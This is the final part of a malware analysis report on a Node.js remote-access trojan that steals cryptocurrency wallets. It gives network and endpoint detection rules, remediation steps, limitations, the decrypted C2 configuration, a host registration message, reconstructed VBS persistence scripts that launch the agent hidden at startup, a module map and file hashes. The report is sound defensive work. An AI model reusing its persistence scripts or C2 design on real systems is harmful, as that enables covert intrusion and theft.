    alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"CORVINater WinAgent operator script fetch"; flow:established,to_server; http.uri; content:"/api/agent/script"; endswith; http.header_names; content:"X-Agent-Token"; nocase; classtype:trojan-activity; sid:9260102; rev:1;)
    alert dns $HOME_NET any -> any any (msg:"CORVINater WinAgent C2 domain lookup"; dns.query; content:"usatraksell.net"; nocase; endswith; classtype:trojan-activity; sid:9260103; rev:1;)

    Endpoint hunting (template)

    Untested Microsoft Defender XDR (KQL) templates:

    // node.exe running from a per-user AppData folder with a .js argument
    DeviceProcessEvents
    | where FileName =~ "node.exe" and FolderPath has_any (@"\AppData\Roaming\", @"\AppData\Local\")
    | where ProcessCommandLine has ".js" and not(FolderPath has_any ("Microsoft VS Code", "nodejs"))
    | project Timestamp, DeviceName, AccountName, FolderPath, ProcessCommandLine, InitiatingProcessFileName
    
    // Startup-folder VBS that launches another AppData VBS hidden
    DeviceFileEvents
    | where FolderPath has @"\Start Menu\Programs\Startup\" and FileName endswith ".vbs"
    | project Timestamp, DeviceName, FolderPath, FileName, InitiatingProcessFileName, InitiatingProcessCommandLine
    
    // msiexec custom action starting node.exe
    DeviceProcessEvents
    | where FileName =~ "node.exe" and InitiatingProcessFileName =~ "msiexec.exe"
    | where ProcessCommandLine has "--setup"

    Behavioural detections

    • msiexec.exe (custom-action server) spawning node.exe, python.exe, or another bundled interpreter.
    • node.exe spawning cmd.exe /d /s /c powershell.exe … MachineGuid or … Win32_ComputerSystem within a minute of start.
    • wscript.exe //B //Nologo launched from a Startup-folder .vbs with an %LOCALAPPDATA% argument.
    • Named pipes matching wra-[0-9a-f]{24}.
    • WebSocket upgrade requests to port 443 without TLS.

    15 Response and remediation

    Containment

    • Isolate affected hosts from the network (EDR isolation or switch port).
    • Block the domains in section 12 at DNS, proxy, and firewall, and alert on any further lookups.
    • Capture volatile evidence before cleaning: process list, install-meta.json, the KhakiAmber folder, and Sysmon/EDR telemetry.

    Eradication

    • Terminate node.exe processes running from %APPDATA%\JadeLilac\Lilac\.
    • Delete the Startup item AzureCopper.vbs and %LOCALAPPDATA%\Cerulean\.
    • Delete %APPDATA%\JadeLilac\, %APPDATA%\KhakiAmber\, and %LOCALAPPDATA%\BronzeMauve\ (use the scatter.paths from install-meta.json for other builds).
    • Uninstall “User Workspace Tools” from Apps & Features, or remove it by UpgradeCode.
    • Check %TEMP% for winagent-deploy\, agent-dl-*, and wra-* artifacts, which indicate additional payloads were delivered; investigate anything found.
    • Because operators had interactive access, re-imaging the host is the safest option.

    Recovery

    • Move cryptocurrency from any wallet present on the host to new wallets created on a clean device; do not reuse seed phrases.
    • Rotate passwords, session tokens, and MFA secrets used in browsers on the host; revoke active sessions.
    • Review the host’s user account for access to other systems during the infection window.

    Prevention

    • Restrict per-user MSI installation (DisableUserInstalls policy) and application allow-listing for AppData.
    • Alert on interpreters (node.exe, python.exe) executing from user profile folders.
    • Inspect cleartext WebSocket traffic on port 443 at the proxy.

    16 Limitations and open questions

    • Second stage not obtained. The theft logic is served from /api/agent/script and was not retrieved; doing so requires contacting live attacker infrastructure, which was not authorized for this analysis.
    • Persistence derived from code. Sandbox windows ended before the 10-minute persistence delay; the persistence files were reconstructed from the malware’s own generator and should be confirmed with a longer run.
    • Contract discovery inactive. The blockchain resolver is disabled in this configuration; the current contents of the listed contracts were not queried.
    • Attribution. No public reporting links this tool to a named actor. German installer strings and per-campaign tokens suggest a commercial or crimeware toolkit used by multiple operators; this is an assessment, not a finding.
    • Initial access. ClickFix delivery was observed on 7 October 2026. The link between that delivery and this exact build is an assessment; a hash of the package served in that intrusion has not been compared.
    • Delivery data. Section 2 is based on endpoint telemetry from one observed intrusion supplied to CORVINater; it was not collected independently.

    Appendix A Decrypted configuration and registration

    A.1 IndigoLime.cfg (decrypted)

    {
      "token": "f84ee2ce545c4a96a1ffa89fae89c0c0",
      "heartbeatIntervalMs": 720000,
      "reconnectDelayMs": 900000,
      "reconnectBackoffMaxMs": 900000,
      "staleWatchdogMs": 1020000,
      "registerAckTimeoutMs": 30000,
      "staleWatchdogIntervalMs": 60000,
      "panelUrl": "ws://usatraksell.net:443",
      "reportClientIp": true
    }

    A.2 Registration message (run 246669ec)

    {
      "type": "register",
      "agent": {
        "id": "DESKTOP-JM9U3AJ-0cc4fcf908f0",
        "machineGuid": "0cc4fcf9-08f0-4666-8831-49950c3dae95",
        "hostname": "DESKTOP-JM9U3AJ",
        "platform": "win32",
        "arch": "x64",
        "username": "analyst",
        "uptime": 89.5,
        "totalMemory": 8519073792,
        "freeMemory": 5882142720,
        "cpus": 2,
        "inDomain": false,
        "adDomain": null,
        "workgroup": "WORKGROUP",
        "localIp": "10.66.0.147",
        "shellV2": true,
        "agentVersion": 2,
        "panelUrl": null
      },
      "token": "f84ee2ce545c4a96a1ffa89fae89c0c0"
    }

    Appendix B Reconstructed persistence scripts

    Generated by running only the malware’s VBS generator (SlateSilver.js) in an isolated sandbox with this build’s seed and paths.

    ' ===== C:\Users\analyst\AppData\Local\Cerulean\EcruGarnet.vbs
    Dim jexsgafh, mnbjtpk, zumybal, qdxgal
    Set jexsgafh = CreateObject("Scripting.FileSystemObject")
    Set mnbjtpk = CreateObject("WScript.Shell")
    zumybal = "C:\Users\analyst\AppData\Roaming\JadeLilac\Lilac\node.exe"
    qdxgal = "C:\Users\analyst\AppData\Local\BronzeMauve\Azure30\launch.js"
    If jexsgafh.FileExists(zumybal) And jexsgafh.FileExists(qdxgal) Then
      mnbjtpk.Run Chr(34) & zumybal & Chr(34) & " " & Chr(34) & qdxgal & Chr(34), 0, False
    End If
    
    ' ===== %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\AzureCopper.vbs
    Dim ijgcdwy, wxwprzkbho, yuzgzev
    Set ijgcdwy = CreateObject("WScript.Shell")
    wxwprzkbho = "C:\Windows\System32\wscript.exe"
    yuzgzev = "C:\Users\analyst\AppData\Local\Cerulean\EcruGarnet.vbs"
    ijgcdwy.Run Chr(34) & wxwprzkbho & Chr(34) & " //B //Nologo " & Chr(34) & yuzgzev & Chr(34), 0, False

    Appendix C Module map

    ModuleRole
    launch.jsLauncher: reads manifest, runs scatter, starts the agent detached
    FlaxVioletMaroon.jsScatter: moves runtime, code, config; empties install folder
    bundleLayout.jsLocates bundled runtime; builds the MSI post-install command
    app\src\CrimsonSilverDenim.jsAgent entry point: WebSocket loop, register, heartbeat, watchdogs
    app\src\IndigoForest.jsConfiguration loader; host profiling (MachineGuid, domain)
    app\src\SlateVioletPearl.jsConfiguration XOR encoder/decoder
    app\src\DenimEcru.jsReads embedded C2 URLs from the config store
    app\src\TanOrchid.jsBuilds the C2 candidate list; connection timeouts
    app\src\CeruleanMaroonRuby.jsBlockchain dead-drop resolver (eth_call)
    app\src\SepiaFuchsia.jsLegacy contract → fallback C2 table (unused)
    app\src\UmberOceanKhaki.jsForces wss:// to ws:// (cleartext)
    app\src\TealEcruSienna.jsPublic-IP lookup via api.ipify.org
    app\src\LimeMaroonCobalt.jsCommand dispatcher (15 commands)
    app\src\TanDusk.jsOperator-script loader (/api/agent/script)
    app\src\EcruFuchsiaUmber.jsPersistence, uninstall, self-deletion
    app\src\SlateSilver.jsSeeded VBS generator for persistence
    app\src\DenimAzure.jsPath and layout resolution
    app\src\KhakiSilver.jsSingle-instance pipe and lock file
    app\src\FuchsiaSandFlax.jsFirst-connect delay (0 in this build)
    app\src\CopperMintSepia.jsBundled dependency check
    app\src\PeachFlax.jsWallet-scan state
    app\src\TealCobaltDenim.js, MintViolet.jsLauncher-CMD helper and scatter stubs (unused)
    handlers\CrimsonMintCerulean.jsInteractive shell (node-pty)
    handlers\TopazCeruleanPeach.jspowershell command
    handlers\ForestSand.jscmd command
    handlers\FuchsiaJadeTopaz.jseval command
    handlers\OceanEcruPearl.jsdownload_run command
    handlers\PearlLimeViolet.jsdeploy command (MSI / PS1 / CMD)
    handlers\CoralSalmonOrchid.jsfiles command (file manager)
    handlers\DuskMaroonCrimson.jsscreenshot command
    handlers\DuskPearl.jsWallet scanner
    handlers\PearlBeige.jsAV / EDR scan
    handlers\DuskGold.jsagent_update (self-update)

    Appendix D File hashes

    FileSizeSHA-256
    Azure30-3ade35b5.msi57,222,618e08a33f5a9a722f05c1fb881ccb48337013a8824444a0fae7adf0e107b5700a0
    runtime\node.exe103,173,960e921fe5307e29bf6fd00000dd594356affd3a7b044e52720c7f10decbdc305b9
    launch.js2,691e89ed5c2f859a81eeda81880edfcb931e8e69988cea86aa425dcbc55cdf661f9
    FlaxVioletMaroon.js4,870de54fd3af55c1b95229bdb25791053e172fb0e75c4e214047b0ae3b330926f98
    bundleLayout.js974142642785c2bd4ca3baf1691dd1c86938f338daadf9f66ba2030d3076a52c686
    install-meta.json1,2383ee1f0744b66ebdb5d0debeffee9bf8ebbf1301eb196cb1c35a34f6cc2b5b473
    IndigoLime.cfg37236c34b602987687457a538d6788113253aaa4e5880a68e0e3df69bed15070252
    agent-version.json36393416eb93cebf61de3856d9650cf0f0f1a62c54848399b3d1d989fa6e718324e
    install-meta.json (after scatter)1,607df97bb9b57b254f592650df7d89d5a8e2a7a294d8af54baf3398000f79a6397c
    app\src\CeruleanMaroonRuby.js10,976c4bf33bb6c5ddc8357537f7d1b1107ad293a5352f2016a2717ecec84aeb4db44
    app\src\CopperMintSepia.js3,555f42d3f717ea64ccb113b5b2bd25cce69f19dcaf89f4bdd14d2f9d4cdd32e4fd0
    app\src\CrimsonSilverDenim.js14,4009dbddba534a154fb29f0edc20d99b7c1d96766ea75cf9a930ab90d0fde3da763
    app\src\DenimAzure.js11,0384b3a357fe7bdec0d8555a8a80c7922f3e85bb18822bdec08ebbbe690b83823b1
    app\src\DenimEcru.js3,743ab36258431c902359d8a6c87145d644f6eb08f9f7fcf4adf3052a27d68c0b6c6
    app\src\EcruFuchsiaUmber.js19,818c10b7deee5ec55bcb3936d88c62a661c99c3d5bd257a5ad50fe58d79f4358050
    app\src\FuchsiaSandFlax.js2,9818133bd9c038df80cfe855d1ae83c3b2aee6c45fb7ed50afdb164f19f6b275e68
    app\src\IndigoForest.js9,286a814f510b8cdfca1ded3f46808af5e91ad2ee0e94f9173c16809bad2c3d33292
    app\src\KhakiSilver.js5,6442e2d350edd52862c48ee6072e9f7b5cde4bfd7d6c03263e242e221128deca365
    app\src\LimeMaroonCobalt.js5,106b8350cad312c3fb8480faec550cd10e390c24119d6f9478d6105c4bf127f6f74
    app\src\MintViolet.js2,305c6770cfd5d0b18dbaea871001c7d18f47f2f132d12b4bf784ebd8a44c3a1b4b9
    app\src\PeachFlax.js2,987eeadf86449af05649e5e4734f0fb02843da800a55a5fa35063e4e7c120840020
    app\src\SepiaFuchsia.js3,041b77b7cd86284c5c1f025176af24c1c432a98eedef5b443dcd263816788bbc54d
    app\src\SlateSilver.js3,30981c10d3a550a0efba3087e6da45ea7e04d11422460b1afb115df92b8ddb2b211
    app\src\SlateVioletPearl.js3,622fbe7e6984be4a22fbe000e4b0f018d170e26b16ee96dbbcda7106f1b42d0c569
    app\src\TanDusk.js4,5484c96caab1f05300825c2b1d818c3aab66dca786071ebf3517cc325bd1cd18840
    app\src\TanOrchid.js4,992b47d2dd6e946df9d1a0aba4951ac13744a1814e3b4a1236a095d7927a787cde5
    app\src\TealCobaltDenim.js3,28348b7bef5d3a7c98411efcb0af108e1b927f2dc266f06df97a4bbce70e5f5c17a
    app\src\TealEcruSienna.js3,011368f80e8d385c2569b366250bbb28f6c77932b728e445e71a640b8bd72c08f4b
    app\src\UmberOceanKhaki.js2,7418072cefe934454e727bff04406537925a006e296ccb4f0e31dcfd7455ceecfaf
    app\src\handlers\CoralSalmonOrchid.js5,7522af45b4fee8f4e89047464a591951d34d203a5533cc14c4be0f71ad484e77f3f
    app\src\handlers\CrimsonMintCerulean.js6,8913acb1d0ddd346b9b5c1fa64dbc2b9ee1b9866cc02b1e0e60ef8785abfe652bb3
    app\src\handlers\DuskGold.js8,32929c03878e42ac20901beba376967c9de97588bbc073a3969c6bfe2846bf40746
    app\src\handlers\DuskMaroonCrimson.js4,901ec44fa52511c43f99a904d86bf917c272d0b7907814408b72c962b28d4a5b726
    app\src\handlers\DuskPearl.js8,674f6b9ce1b3c2111c5f71543a714b13581bb42c8c212137b24c2381f2ccf00c644
    app\src\handlers\ForestSand.js2,874f50d86d68e1b74c0187d73dbcffdf25406f636c34b2f5ca1c0481f3a375fbb45
    app\src\handlers\FuchsiaJadeTopaz.js2,97370cc4cf3986d46c6f9f37e38dd91434123978e8e36ac075d90a2dcd39db2dfac
    app\src\handlers\OceanEcruPearl.js4,380ac10585593e3f161c316d036ac54c31b268c21f357449ec80c30e607dd086975
    app\src\handlers\PearlBeige.js4,5005c0c278c6a3cf5237676afae1926bde3c1437896b65e51a5b62afe292c80dc5d
    app\src\handlers\PearlLimeViolet.js6,5668f1938520d63c220d65f1232ff58b20640e4c1cbdf8317b853b5be0a8a3e4f05
    app\src\handlers\TopazCeruleanPeach.js3,50996f022d77e96fca21c1a798057d29f8fd01f6825561c9e0693d6ba1db34ba60b

    — End of report —